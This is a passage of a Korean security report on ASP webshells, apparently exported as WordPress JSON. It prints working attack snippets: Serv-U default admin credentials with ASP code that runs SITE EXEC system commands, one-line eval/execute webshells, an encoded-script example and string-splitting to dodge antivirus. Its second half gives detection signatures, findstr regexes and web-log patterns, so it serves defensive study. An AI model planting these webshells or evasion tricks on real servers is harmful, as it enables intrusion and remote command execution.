\no Serv-U \ub514\ud3f4\ud2b8 \uad00\ub9ac \uc544\uc774\ub514\/\ud328\uc2a4\uc6cc\ub4dc\ub85c \ub85c\uadf8\uc778
\n– USER LocalAdministrator (\ub514\ud3f4\ud2b8 \uc544\uc774\ub514)
\n– PASS #l@$ak#.lk;0@P (\ub514\ud3f4\ud2b8 \ud328\uc2a4\uc6cc\ub4dc)
\no Serv-U\uc5d0 \uc2e0\uaddc \ub3c4\uba54\uc778 \uc0dd\uc131
\no Serv-U \uba85\ub839\uc5b4 \uc2e4\ud589\uc5d0 \ud544\uc694\ud55c Serv-U \uc0ac\uc6a9\uc790 \ucd94\uac00
\no \u201cSITE EXEC\u201c Serv-U \ub0b4\ubd80 \uc2a4\ud06c\ub9bd\ud2b8\ub97c \ud1b5\ud55c \uc2dc\uc2a4\ud15c \uba85\ub839\uc5b4 \uc218\ud589<\/p>\n
set a=Server.CreateObject(\u201cMicrosoft.XMLHTTP\u201d)
\na.open \u201cGET\u201d, \u201chttp:\/\/127.0.0.1:\u201d & port & \u201c\/goldsun\/upadmin\/s1\u201d,True, \u201c\u201d, \u201c\u201d
\na.send loginuser & loginpass & \u201cSITE MAINTENANCE\u201d & deldomain & newdomain &
\nnewuser & quit
\nset session(\u201ca\u201d)=a
\nset b=Server.CreateObject(\u201cMicrosoft.XMLHTTP\u201d)
\nb.open \u201cGET\u201d, \u201chttp:\/\/127.0.0.1:\u201d & ftpport & \u201c\/goldsun\/upadmin\/s2\u201d, True, \u201c\u201d, \u201c\u201d
\nb.send \u201cUser go\u201d & vbCrLf & \u201cpass od\u201d & vbCrLf & \u201cSITE EXEC \u201c & cmd & vbCrLf & quit
\nset session(\u201cb\u201d)=b<\/p>\n
\ub098. \uc2a4\ud06c\ub9bd\ud2b8 \uc778\ucf54\ub529
\n\ub9c8\uc774\ud06c\ub85c\uc18c\ud504\ud2b8\u793e\uc758 \uc708\ub3c4\uc6b0 \uc2a4\ud06c\ub9bd\ud2b8\ub294 Script Encoder\ub97c \uc81c\uacf5\ud558\uc5ec \uc77c\ubc18 \uc0ac\uc6a9\uc790\ub4e4\uc774 \uc2a4\ud06c\ub9bd\ud2b8 \ub0b4\uc6a9\uc744 \ud655\uc778\ud558\ub294\uac8c \uc27d\uc9c0 \uc54a\ub3c4\ub85d \ud558\uace0 \uc788\ub2e4. \ud558\uc9c0\ub9cc \uc6f9\uc258\uc744 \uc5c5\ub85c\ub4dc\ud55c \uacf5\uaca9\uc790\uac00 \uc774\ub7ec\ud55c \uae30\ub2a5\uc744 \uc545\uc6a9\ud558\uc5ec \uad00\ub9ac\uc790\uac00 \uc6f9\uc258\uc744 \uc27d\uac8c \ucc3e\uc9c0 \ubabb\ud558\ub3c4\ub85d \ubc31\uc2e0\ud0d0\uc9c0\ub97c \uc6b0\ud68c \ud558\ub294\ub370 \uc774\uc6a9\ud558\uace0 \uc788\ub2e4.<\/p>\n
http:\/\/msdn2.microsoft.com\/en-us\/library\/cbfz3598(VS.85).aspx<\/p>\n
Script Encoder\ub294 \ucf58\uc194\ubaa8\ub4dc\uc5d0\uc11c \uba85\ub839\uc5b4 \ub77c\uc778\uc73c\ub85c \uc2e4\ud589\ub418\uba70 \ub2e4\uc74c\uacfc \uac19\uc774 \uc0ac\uc6a9\ud55c\ub2e4.<\/p>\n
SCRENC [switches] inputfile outputfile<\/p>\n
\uc77c\ubc18 asp \uc2a4\ud06c\ub9bd\ud2b8\ub97c \uc778\ucf54\ub529 \ud558\uba74 \uc544\ub798\uc640 \uac19\uc740 \uacb0\uacfc\uac00 \ub41c\ub2e4.
\n\uc77c\ubc18 \uc18c\uc2a4
\n\uc778\ucf54\ub529 \uc18c\uc2a4
\n<script language=\u201dVBScript\u201d>
\n<%
\nThis is test
\n%>
\n<\/script> <%@ LANGUAGE = VBScript.Encode %>
\n<script language=\u201dVBScript\u201d>
\n<%#@~^FAAAAA==@#@&K4b\/,k\/,Y dY
\n@#@&ogQAAA==^#~@%>
\n<\/script>
\n[\uadf8\ub9bc] scrdec18 \ud504\ub85c\uadf8\ub7a8\uc744 \uc774\uc6a9\ud55c \ub514\ucf54\ub529<\/p>\n
\ub2e4. \uc9e7\uc740 \uc6f9\uc258
\nASP \uc6f9\uc258 \uc911 eval, execute \uba54\uc18c\ub4dc\ub97c \uc774\uc6a9\ud558\uc5ec \uacf5\uaca9\uc790\ub85c\ubd80\ud130 \uc6f9\uc258 \ucf54\ub4dc\ub97c \uc804\ub2ec \ubc1b\uc544 \uc2e4\ud589\ud558\ub294 \uc9e7\uc740 \uc18c\uc2a4 \ucf54\ub4dc\ub4e4\uc774 \uc788\ub2e4. \uc774\uac19\uc774 \uc9e7\uc740 \uc18c\uc2a4\ucf54\ub4dc\uac00 \uc815\uc0c1\uc801\uc778 \uc18c\uc2a4\uc5d0 \uc0bd\uc785\ub418\uc5b4 \uc2e4\ud589\ub418\ub294 \uacbd\uc6b0\ub3c4 \uc788\uc73c\ubbc0\ub85c \uad00\ub9ac\uc790\ub4e4\uc758 \uac01\ubcc4\ud55c \uc8fc\uc758\uac00 \ud544\uc694\ud558\ub2e4.<\/p>\n
– eval (expression) : eval \ud568\uc218\ub294 expression\uc73c\ub85c \uc815\uc758\ub41c \ucf54\ub4dc\ub97c \ud3c9\uac00\ud558\uc5ec \uacb0\uacfc(True, False)\ub97c \uc54c\ub824\uc900\ub2e4.
\n– execute (expression) : execute \ud568\uc218\ub294 expression\uc73c\ub85c \uc815\uc758\ub41c \ucf54\ub4dc\ub97c \uc2e4\ud589\ud558\uc5ec \uacb0\uacfc\ub97c \uc54c\ub824\uc900\ub2e4.<\/p>\n
eval, execute \uba54\uc18c\ub4dc\ub97c \uc774\uc6a9\ud55c \uc6f9\uc258 \uad6c\ub3d9 \ubc29\ubc95\uc740 \uc544\ub798 \uac1c\uc694\ub3c4\ucc98\ub7fc, \uba3c\uc800 \uacf5\uaca9\uc790\ub294 \ud53c\ud574\uc2dc\uc2a4\ud15c\uc5d0 \uc6f9\uc258 \ucf54\ub4dc\ub97c \ubcf4\ub0b4\ub294 html \ud3fc(2006_lite.asp.html)\uc744 \uc900\ube44\ud558\uace0 \uadf8 \ud3fc\uc5d0 \uc6f9\uc258 \ucf54\ub4dc\ub97c \ub123\uc5b4 \ud53c\ud574 \uc2dc\uc2a4\ud15c \uc6f9\uc258(server.asp)\uc5d0 \uc804\uc1a1\ud55c\ub2e4. \ud53c\ud574\uc2dc\uc2a4\ud15c\uc5d0\uc11c\ub294 \uc6f9\uc258 \ucf54\ub4dc\ub97c \uc804\ub2ec \ubc1b\uc544 execute, eval \uba54\uc18c\ub4dc\ub85c \uc2e4\ud589\ud558\uace0 execute \uba54\uc18c\ub4dc\ub294 \uacb0\uacfc\ub97c \uacf5\uaca9\uc790\uc5d0\uac8c \uc804\ub2ec\ud574 \uc900\ub2e4. (eval \uba54\uc18c\ub4dc\ub294 \ucf54\ub4dc\ub97c \uc2e4\ud589\ud558\uace0 \uacb0\uacfc\uc5d0 \ub300\ud55c True, False \ub9cc\uc744 \uc54c\ub824\uc8fc\ubbc0\ub85c \uc801\uc808\ud55c \uacb0\uacfc\ub97c \uacf5\uaca9\uc790\uc5d0\uac8c \uc54c\ub824\uc8fc\uc9c0\ub294 \ubabb\ud55c\ub2e4)<\/p>\n
[\uadf8\ub9bc] execute, eval \ucf54\ub4dc\ub97c \uc774\uc6a9\ud55c \uc6f9\uc258 \uc2e4\ud589 \ubc29\ubc95<\/p>\n
\u25a0 eval \ucf54\ub4dc
\n\ub2e4\uc74c\uc740 \ud53c\ud574\uc2dc\uc2a4\ud15c\uc5d0\uc11c \ubc1c\uacac\ub41c eval \ucf54\ub4dc \uc720\ud615\uc774\uba70 \uc544\ub798\uc640 \uac19\uc774 \ud55c \uc904, \uc9e7\uc740 \ucf54\ub4dc\ub85c \uc774\ub8e8\uc5b4\uc9c4\ub2e4.
\n– <%eval request(\u201cl\u201d)%>
\n– <%eval(request(\u201c#\u201d))%><\/p>\n
\u25a0 execute \ucf54\ub4dc
\n\ub2e4\uc74c\uc740 \ud53c\ud574\uc2dc\uc2a4\ud15c\uc5d0\uc11c \ubc1c\uacac\ub41c execute \ucf54\ub4dc \uc720\ud615\uc774\ub2e4.
\n– <%execute request(\u201cl\u201d)%>
\n– <%If Request(\u201c#\u201d)<>\u201d\u201d Then Execute(Request(\u201c#\u201d))%><\/p>\n
\u25a0 execute \uc138\uc158 \uc720\uc9c0 \uc6a9 \ucf54\ub4dc
\nexecute \uba54\uc18c\ub4dc\ub97c \uc774\uc6a9\ud55c \uc9e7\uc740 \ucf54\ub4dc\uc758 \uacbd\uc6b0 \uacf5\uaca9\uc790\uac00 \uc2e4\ud589\ud558\uae30 \uc6d0\ud558\ub294 \ucf54\ub4dc\ub97c \uc704 \uac1c\uc694\ub3c4 \uadf8\ub9bc\ucc98\ub7fc \ub9e4\ubc88 \uc804\uc1a1\ud574\uc8fc\uc5b4\uc57c \ud558\ub294 \ubc88\uac70\ub85c\uc6c0\uc774 \uc788\ub2e4. \uadf8\ub798\uc11c \uacf5\uaca9\uc790\ub4e4\uc740 \ud55c\ubc88 \ub118\uaca8\uc900 \ucf54\ub4dc\ub97c \uc2e4\ud589\ud55c \uacb0\uacfc\ub97c \uc138\uc158\uc73c\ub85c \uc5f0\uacb0\ud558\uc5ec \ub2e4\uc74c\uc5d0\ub294 \ucf54\ub4dc\ub97c \ub118\uaca8\uc904 \ud544\uc694 \uc5c6\uc774 \uc2e4\ud589 \uacb0\uacfc\uc5d0\uc11c \ub2e4\uc74c \uba54\ub274\ub85c \ub118\uc5b4\uac08 \uc218 \uc788\ub3c4\ub85d \ud558\uc600\ub2e4.<\/p>\n
<script language=\u201dvbscript\u201d runat=\u201dserver\u201d>
\nIf Request(\u201casdf\u201d)<>\u201d\u201d Then Session(\u201c\uc870\uc9c1\ud0ac\ub7ec\u201d)=Request(\u201casdf\u201d)
\nIf Session(\u201c\uc870\uc9c1\ud0ac\ub7ec\u201d)<>\u201d\u201d Then Execute(Session(\u201c\uc870\uc9c1\ud0ac\ub7ec\u201d))
\n<\/script><\/p>\n
\ub77c. \uae30\ud0c0<\/p>\n
\u25a0 \ubb38\uc790\uc5f4 \ubd84\ub9ac\ub97c \uc774\uc6a9\ud55c \ud0d0\uc9c0 \uc6b0\ud68c \uae30\ub2a5
\n\ucd5c\uadfc \ubc14\uc774\ub7ec\uc2a4 \ubc31\uc2e0\uc774\ub098 \uc11c\ubc84 \uad00\ub9ac\uc790\ub4e4\uc774 \uc6f9\uc258 \uc2dc\uadf8\ub2c8\uccd0\ub97c \ud1b5\ud574 \uc6f9\uc258 \ud0d0\uc9c0\uac00 \ub9ce\uc544\uc9c0\uc790 \uacf5\uaca9\uc790 \ub4e4\uc740 \uc2dc\uadf8\ub2c8\uccd0\ub85c \uc774\uc6a9\ub418\ub294 \ubb38\uc790\uc5f4(\uc624\ube0c\uc81d\ud2b8 \uba85)\ub4e4\uc744 \ubd84\uc0b0\uc2dc\ucf1c \ud0d0\uc9c0\ub97c \uc6b0\ud68c\ud558\uace0 \uc788\ub2e4.<\/p>\n
– Shell.Application
\n\ubb38\uc790\uc5f4\uc744 \uc5f0\uacb0\ud558\ub294 & \uc5f0\uc0b0\uc790\ub97c \uc774\uc6a9\ud558\uace0 \uac12\uc774 \uc8fc\uc5b4\uc9c0\uc9c0 \uc54a\uc740 \ubcc0\uc218 x\ub97c \uc774\uc6a9\ud574 \uc544\ub798\uc640 \uac19\uc774
\nShell.Application \ubb38\uc790\uc5f4\uc744 \ubd84\ub9ac\ud55c\ub2e4.
\nSet sa = Server.CreateObject\u201c( She\u201d&x&\u201dll.Appl\u201d&x&\u201dication\u201d)
\n\u201cShe\u201d&x&\u201dll.Appl\u201d&x&\u201dication\u201d=>\u201c Shell.Application\u201d
\n– WScript.Shell
\nSet ws = Server.CreateObject\u201c( WScr\u201d&x&\u201dipt.Shell\u201d)<\/p>\n
\u25a0 \ud30c\uc77c \uc0dd\uc131 \uc6f9\uc258
\nScripting.FileSystemObject \uc624\ube0c\uc81d\ud2b8\ub97c \uc774\uc6a9\ud558\uc5ec \uc0c8\ub85c\uc6b4 \ud30c\uc77c\uc744 \uc0dd\uc131\ud558\ub294 \uae30\ub2a5\uc744 \uc55e\uc11c \uc0b4\ud3b4 \ubcf4\uc558\ub2e4. \ucd5c\uadfc \uc815\uc0c1\uc801\uc778 \uc2a4\ud06c\ub9bd\ud2b8\ub4e4\uc5d0\uc11c\ub3c4 \uc0ac\uc6a9\ud558\ub294 CreateTextFile, Write \uba54\uc18c\ub4dc\ub97c \uc774\uc6a9\ud558\uc5ec \ub2e8\uc9c0 \ud30c\uc77c\ub9cc \uc0dd\uc131\ud558\ub294 \uc6f9\uc258\ub4e4\uc774 \uc99d\uac00\ud558\uace0 \uc788\ub2e4. \uc774\ub7ec\ud55c \uc6f9\uc258\uc740 \uc815\uc0c1\uc801\uc778 \uc2a4\ud06c\ub9bd\ud2b8\uc5d0\uc11c \uc0ac\uc6a9\ud558\ub294 \uc624\ube0c\uc81d\ud2b8\uc640 \uba54\uc18c\ub4dc\ub97c \uc0ac\uc6a9\ud558\ubbc0\ub85c \ud0d0\uc9c0\ud558\uae30\uac00 \uc27d\uc9c0 \uc54a\ub2e4. \ub610\ud55c \uc774\ub7ec\ud55c \uc6f9\uc258\ub4e4\uc740 \uc55e\uc11c \uc124\uba85\ud55c \ub2e4\uc591\ud55c \uae30\ub2a5\uc744 \uac00\uc9c0\ub294 \uc6f9\uc258\uc744 \uc5bc\ub9c8\ub4e0\uc9c0 \uc0dd\uc131\ud560 \uc218\uac00 \uc788\uc5b4 \uad00\ub9ac\uc790\ub4e4\uc758 \uc8fc\uc758\uac00 \ud544\uc694\ud558\ub2e4.<\/p>\n
[\uadf8\ub9bc] \ud30c\uc77c \uc0dd\uc131 \uc6f9\uc258 \ud654\uba74<\/p>\n
3. \ud0d0\uc9c0 \ubc29\uc548<\/p>\n
\uac00. \uc6f9\uc258 \uc2dc\uadf8\ub2c8\uccd0\ub97c \uc774\uc6a9\ud55c \ud30c\uc77c \uac80\uc0c9<\/p>\n
\u25a0 \uc2dc\uadf8\ub2c8\uccd0
\n\uc6f9\uc258\uc740 \uc2dc\uc2a4\ud15c \uba85\ub839\uc5b4\ub97c \uc218\ud589\ud558\uac70\ub098 \ud30c\uc77c\uc744 \uc870\uc791\ud558\uae30 \uc704\ud574 \uad00\ub828\ub41c \uc624\ube0c\uc81d\ud2b8, Wscript.Shell, Shell.Application \ub4f1\uc744 \uc8fc\ub85c \uc0ac\uc6a9\ud558\uac8c \ub41c\ub2e4. \ud558\uc9c0\ub9cc \uc774\ub7ec\ud55c \uc624\ube0c\uc81d\ud2b8\ub294 \uc815\uc0c1\uc801\uc778 \uc2a4\ud06c\ub9bd\ud2b8 \ucf54\ub4dc\uc5d0\uc11c\ub294 \uc0ac\uc6a9\ud558\uc9c0 \uc54a\ub294 \uac83\ub4e4\ub85c \uc6f9\uc258 \ud0d0\uc9c0\ub97c \uc704\ud55c \uc2dc\uadf8\ub2c8\uccd0\ub85c \uc9c0\uc815\ud558\uc5ec \uc6f9\uc258\uc744 \ud0d0\uc9c0\ud558\ub294\ub370 \uc774\uc6a9\ud560 \uc218 \uc788\ub2e4. \uc774\ub807\uac8c \uc2dc\uadf8\ub2c8\uccd0\ub85c \uc9c0\uc815\ud560 \ub9cc\ud55c \ubb38\uc790\uc5f4\ub4e4\uc744 \ucc3e\uc544\ubcf8 \uacb0\uacfc \ub2e4\uc74c\uacfc \uac19\uc558\ub2e4.<\/p>\n
– Wscript.Shell, Shell.Application \uacfc \uac19\uc740 \uc2dc\uc2a4\ud15c\uc5d0 \uc811\uadfc\ud560 \uc218 \uc788\ub294 \uc624\ube0c\uc81d\ud2b8\ub098 \uba54\uc18c\ub4dc
\n– \uc778\ucf54\ub529\ub41c \ud30c\uc77c\uc5d0 \uc0bd\uc785\ub41c \ud5e4\ub354 \ubb38\uc790\uc5f4 VBScript.Encode
\n– \uc911\uad6d\uc5b4 \uac04\uccb4 gb2312
\n– \uc2dc\uc2a4\ud15c \uba85\ub839\uc5d0 \ud544\uc694\ud55c \ubb38\uc790\uc5f4 cmd.exe
\n– \uc815\uc0c1\uc801\uc778 \uc2a4\ud06c\ub9bd\ud2b8\uc5d0\uc11c \ud754\ud788 \uc0ac\uc6a9\ub418\uc9c0 \uc54a\ub294 eval, execute \ud568\uc218 \ub4f1
\ncmd\\.exe
\nWscript\\.Shell Shell\\.Application VBScript\\.Encode gb2312
\nexecute *\\(? *session execute *\\(? *request eval *\\(? *request \uff3c.run.*> \\.exec *\\(
\nwebshell lake2 hack520 lcxMarcos Marcos<\/p>\n
\u25a0 findstr \uba85\ub839\uc5b4\ub97c \ud65c\uc6a9\ud55c \ud0d0\uc9c0 \ubc29\ubc95
\nfindstr \uc774\ub77c\ub294 \uba85\ub839\uc5b4\ub294 \uc9c0\uc815\ub41c \ud30c\uc77c\ub4e4\uc5d0\uc11c \ucc3e\uace0\uc790 \ud558\ub294 \ud2b9\uc815 \ubb38\uc790\uc5f4\ub4e4\uc744 \uac80\uc0c9\ud560 \uc218 \uc788\ub3c4\ub85d \ub3c4\uc640\uc900\ub2e4. \uc704\uc5d0\uc11c \uc815\uc758\ub41c \uc2dc\uadf8\ub2c8\uccd0\ub4e4\uc744 \ud30c\uc77c(asp.sig)\ub85c \uc9c0\uc815\ud558\uace0 \uc0ac\uc774\ud2b8 \ud648 \ub514\ub809\ud130\ub9ac\uc5d0\uc11c \uc544 \ub798\uc758 \uc608\ucc98\ub7fc \uc2e4\ud589\ud574 \ubcf4\uae30 \ubc14\ub780\ub2e4.<\/p>\n
findstr \/i \/r \/s \/g:asp.sig *.asp<\/p>\n
– i : \ub300\uc18c\ubb38\uc790 \uad6c\ubd84\uc5c6\uc774 \uac80\uc0c9
\n– g : \uc9c0\uc815\ub41c \ud30c\uc77c\uc5d0\uc11c \uac80\uc0c9 \ubb38\uc790\uc5f4\uc744 \ubc1b\uc74c
\n– r : \uc815\uaddc \ud45c\ud604\uc2dd \uc0ac\uc6a9
\n– s : \ubaa8\ub4e0 \ud558\uc704\ub514\ub809\ud130\ub9ac \uac80\uc0c9<\/p>\n
\u203b \ucd5c\uadfc \uacf5\uaca9\uc790\ub4e4\uc774 \uc6f9\uc258 \ud655\uc7a5\uc790\ub97c .cer, .asa, cdx, hta\ub85c \ubcc0\uacbd\ud558\uc5ec \ud30c\uc77c\uc744 \uc5c5\ub85c\ub4dc \ud558\ub294 \uacbd\uc6b0\uac00 \uc788\ub2e4.(\ud30c\uc77c \uc5c5\ub85c\ub4dc
\n\uc6b0\ud68c \uacf5\uaca9) \ubc18\ub4dc\uc2dc \uac80\uc0ac \ud655\uc7a5\uc790\ub97c asp \ubfd0\ub9cc \uc544\ub2c8\ub77c \uc2a4\ud06c\ub9bd\ud2b8\ub85c \uc2e4\ud589\ub418\ub3c4\ub85d \uc9c0\uc815\ub41c .asa, .cer \ub4f1\ub3c4 \ubc18\ub4dc\uc2dc \ud568\uaed8
\n\uac80\uc0c9 \ud558\ub3c4\ub85d \ud574\uc57c \ud55c\ub2e4.
\n[\uadf8\ub9bc] \uac80\uc0ac\ub300\uc0c1 \ud655\uc7a5\uba85<\/p>\n
\ub098. \uc6f9\uc258 \ub85c\uadf8 \uc2dc\uadf8\ub2c8\uccd0\ub97c \uc774\uc6a9\ud55c \uc6f9 \ub85c\uadf8 \uac80\uc0c9<\/p>\n
\u25a0 \uc2dc\uadf8\ub2c8\uccd0
\n\ucd5c\uadfc \ub300\ubd80\ubd84\uc758 \uc6f9\uc258\ub4e4\uc740 POST \ubc29\uc2dd\uc73c\ub85c \uad00\ub828 \ub370\uc774\ud130\ub4e4\uc744 \uc804\uc1a1\ud558\uae30 \ub54c\ubb38\uc5d0 \uc6f9 \ub85c\uadf8\uc5d0\uc11c \uc6f9\uc258\uc774 \uc2e4\ud589\ub41c \ud754\uc801\uc744 \ucc3e\uae30\uac00 \uc27d\uc9c0 \uc54a\ub2e4. \ud558\uc9c0\ub9cc \ub9ce\uc740 \uc6f9\uc258\ub4e4\uc740 \uc2e4\ud589\ud560 \uba54\ub274\ub4e4\uc744 GET \ubc29\uc2dd\uc73c\ub85c \uc804\ub2ec \ud558\uc5ec \uc774\ub7ec\ud55c \ub85c\uadf8\ub4e4\uc744 \ub300\uc0c1\uc73c\ub85c \uc2dc\uadf8\ub2c8\uccd0\ub97c \ucd94\ucd9c \ud560 \uc218 \uc788\uc5c8\ub2e4. \uc544\ub798 8.0.asp \uc6f9\uc258\uc5d0\uc11c \uc2dc\uc2a4\ud15c \uba85\ub839\uc5b4 \uc218\ud589\ud558\ub294 \uba54\ub274\ub97c \uc2e4\ud589\ud558\uba74 \uc544\ub798\uc640 \uac19\uc774 \/WebShell\/8.0.asp?Action=Cmd1Shell GET \uc694\uccad\uc744 \ud558\uac8c \ub418\uc5b4 Action=Cmd1Shell \uc774\ub77c\ub294 \uace0\uc720\uc758 \uc2dc\uadf8\ub2c8\uccd0\ub97c \uc5bb\uc744 \uc218 \uc788\ub2e4.<\/p>\n
ex) http:\/\/victim.com\/WebShell\/8.0.asp?Action=Cmd1Shell<\/p>\n
\uc778\ud130\ub137\uce68\ud574\uc0ac\uace0\ub300\uc751\uc9c0\uc6d0\uc13c\ud130\uc5d0\uc11c \ud53c\ud574\uc2dc\uc2a4\ud15c\uc5d0\uc11c \uc218\uc9d1\ub41c \uc6f9\uc258\uc744 \ud14c\uc2a4\ud2b8\ud558\uace0 \uc544\ub798\uc640 \uac19\uc774 \uc6f9\uc258 \uc2e4\ud589\uc5ec\ubd80\ub97c \ud655\uc778\ud560 \uc218 \uc788\ub294 \uc2dc\uadf8\ub2c8\uccd0\ub97c \ucd94\ucd9c\ud558\uc600\ub2e4.
\nAction=MainMenu
\nAction=Show1File
\nAction=EditFile
\nAction=DbManager
\nAction=getTerminalInfo
\nAction=ServerInfo
\nAction=Servu
\nAction=kmuma
\nAction=kmuma&act=scan
\nAction=Cplgm&M=2
\nAction=plgm
\nAction=PageAddToMdb >
\nAction=ReadREG
\nAction=ScanPort
\nAction=Cmd1Shell
\nAction=UpFile
\n(pageName|id|list|action|act)=ServiceList
\n(pageName|id|list|action|act)=ServiceList
\n(pageName|id|list|action|act)=infoAboutSrv
\n(pageName|id|list|action|act)=objOnSrv
\n(pageName|id|list|action|act)=userList
\n(pageName|id|list|action|act)=WsCmdRun
\n(pageName|id|list|action|act)=SaCmdRun
\n(pageName|id|list|action|act)=SaCmdRun&theAct
\n(pageName|id|list|action|act)=FsoFileExplorer
\n(pageName|id|list|action|act)=FsoFileExplorer&theAct
\n(pageName|id|list|action|act)=FsoFileExplorer&thePath
\npageName=MsDataBase
\npageName=MsDataBase&theAct=showTables
\npageName=TxtSearcher
\npageName=OtherTools
\nact=scan
\nAction=mainwin
\naction=listtb
\naction=listvw
\naction=listdb
\naction=execsql
\naction=dbsrcbox
\naction=searchfile
\naction=xpcmdshell
\n(action|act)=cmdshell
\naction=mainmenu
\naction=showfile
\naction=editfile
\naction=course
\naction=serverinfo
\naction=upfile
\naction=dbmanager
\nex=edit&pth=
\nPageName=PageUpload&theAct
\nPageName=PageWebProxy&url=
\nproductName=HigroupASPAdmin
\nPageWebProxy
\naCTiON=cMd
\naCTiON=ClonETiMe&SrC=
\naCTiON=SqLrOotKIt
\naCTiON=Reg
\naCTiON=DAtA
\naCTiON=Goto&SrC=C:\\
\naCTiON=uPFIlE&SrC=
\naCTiON=NEw&SrC=
\nact=info
\nact=filemanage
\nact=edit&src=
\nact=del&src=
\nact=rename&src=
\nDirName=
\nType=.*FileName=.*\\
\nType=.*ok=dir
\nFsoFileExplorer
\nWsCmdRun
\nSaCmdRun
\nMsDataBase
\nHigroupASPAdmin
\n=cmd
\nClonETiMe
\nSqLrOotKIt<\/p>\n
4. \uacb0\ub860
\n\uad00\ub9ac\ud558\ub294 \uc11c\ubc84\uc5d0\uc11c \uc6f9\uc258\uc774 \ud0d0\uc9c0\ub418\uc5c8\ub2e4\uba74 \uc2dc\uc2a4\ud15c\uc5d0 \uc6f9\uc258\uc744 \uc0dd\uc131\ud560 \uc218 \uc788\uc5c8\ub358 \ucde8\uc57d\uc810\uc774 \uc874\uc7ac \ud560 \uac83 \uc774\ub2e4. \uc6f9\uc258\uc774 \uc5c5\ub85c\ub4dc \ub41c \ud53c\ud574\uc2dc\uc2a4\ud15c\uc744 \ubd84\uc11d\ud55c \uacb0\uacfc \ub300\ubd80\ubd84 \ud30c\uc77c \uc5c5\ub85c\ub4dc, SQL Injection\uacfc \uac19\uc740 \uc5b4\ud50c\ub9ac\ucf00\uc774\uc158 \ucde8\uc57d\uc810\uc73c\ub85c \uc6f9\uc258\uc774 \uc0dd\uc131\ub418\ub294 \uac83\uc73c\ub85c \ud655\uc778\ub418\uc5c8\ub2e4. \uc6f9\uc258\uc744 \ud0d0\uc9c0\ud574\uc11c \uc81c\uac70\ud558\ub294 \uac83\ub3c4 \uc911\uc694\ud558\uc9c0\ub9cc \uc6f9\uc258\uc744 \uc0dd\uc131\ud560 \uc218 \uc788\uc5c8\ub358 \uadfc\ubcf8\uc801\uc778 \ucde8\uc57d\uc810\uc744 \ucc3e\uc544\ub0b4\uc5b4 \ud328\uce58\ud558\ub294 \uac83\ub3c4 \uad00\ub9ac\uc790\ub4e4\uc774 \uaf2d~! \uc78a\uc9c0 \uc54a\uace0 \ud574\uc57c \ub420 \uc791\uc5c5\uc77c \uac83\uc774\ub2e4.
\n\uc55e\uc11c \ud0d0\uc9c0 \ubc29\ubc95\uc5d0\uc11c \uc81c\uacf5\ud55c \uc2dc\uadf8\ub2c8\uccd0\ub4e4\uc740 \uc624\ud0d0\uc774 \ubc1c\uc0dd\ud560 \uc218 \uc788\uc73c\ubbc0\ub85c \ubc18\ub4dc\uc2dc \uc774 \ubcf4\uace0\uc11c\uc5d0\uc11c \uc124\uba85\ud55c \uae30\ub2a5\uc744 \uac16\ub294 \uc6f9\uc258\uc778\uc9c0 \ud655\uc778 \ud6c4 \uc0ad\uc81c\ud574\uc57c \ud55c\ub2e4<\/p>\n","protected":false},"excerpt":{"rendered":"
ASP \uc6f9\uc258 \uc0c1\uc138 \ubd84\uc11d \ubc0f \ud0d0\uc9c0 \ubc29\uc548 1. \uac1c \uc694 \uac00. \uc6f9\uc258\uc774\ub780? \uc6f9\uc258\uc774\ub780 \uacf5\uaca9\uc790\uac00 \uc6d0\uaca9\uc5d0\uc11c \ub300\uc0c1 \uc6f9\uc11c\ubc84\uc5d0 \uba85\ub839\uc744 \uc218\ud589\ud560 \uc218 \uc788\ub3c4\ub85d \uc791\uc131\ud55c \uc6f9 \uc2a4\ud06c\ub9bd\ud2b8 (asp, jsp, php, cgi) \ud30c\uc77c\uc774\ub2e4. \uc774\ub54c zip, jpg, doc\uc640 \uac19\uc740 \ub370\uc774\ud130 \ud30c\uc77c\uc885\ub958 \uc774\uc678\uc5d0 \uc545\uc758\uc801\uc73c\ub85c \uc81c\uc791\ub41c \uc2a4\ud06c\ub9bd\ud2b8 \ud30c\uc77c\uc778 \uc6f9\uc258\uc744 \uc5c5\ub85c\ub4dc\ud558\uc5ec \uc6f9 \uc11c\ubc84\ub97c \ud574\ud0b9\ud558\ub294 \uc0ac\uace0\uac00 \ube48\ubc88\ud788 \ubc1c\uc0dd\ud558\uace0 \uc788\ub2e4. \ucd5c\uadfc\uc5d0\ub294 \ud30c\uc77c \uc5c5\ub85c\ub4dc\ubfd0\ub9cc \uc544\ub2c8\ub77c SQL […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[9],"tags":[],"class_list":["post-89","post","type-post","status-publish","format-standard","hentry","category-general"],"_links":{"self":[{"href":"https:\/\/www.onepage.co.kr\/wordpress\/index.php\/wp-json\/wp\/v2\/posts\/89","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.onepage.co.kr\/wordpress\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.onepage.co.kr\/wordpress\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.onepage.co.kr\/wordpress\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.onepage.co.kr\/wordpress\/index.php\/wp-json\/wp\/v2\/comments?post=89"}],"version-history":[{"count":1,"href":"https:\/\/www.onepage.co.kr\/wordpress\/index.php\/wp-json\/wp\/v2\/posts\/89\/revisions"}],"predecessor-version":[{"id":90,"href":"https:\/\/www.onepage.co.kr\/wordpress\/index.php\/wp-json\/wp\/v2\/posts\/89\/revisions\/90"}],"wp:attachment":[{"href":"https:\/\/www.onepage.co.kr\/wordpress\/index.php\/wp-json\/wp\/v2\/media?parent=89"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.onepage.co.kr\/wordpress\/index.php\/wp-json\/wp\/v2\/categories?post=89"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.onepage.co.kr\/wordpress\/index.php\/wp-json\/wp\/v2\/tags?post=89"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}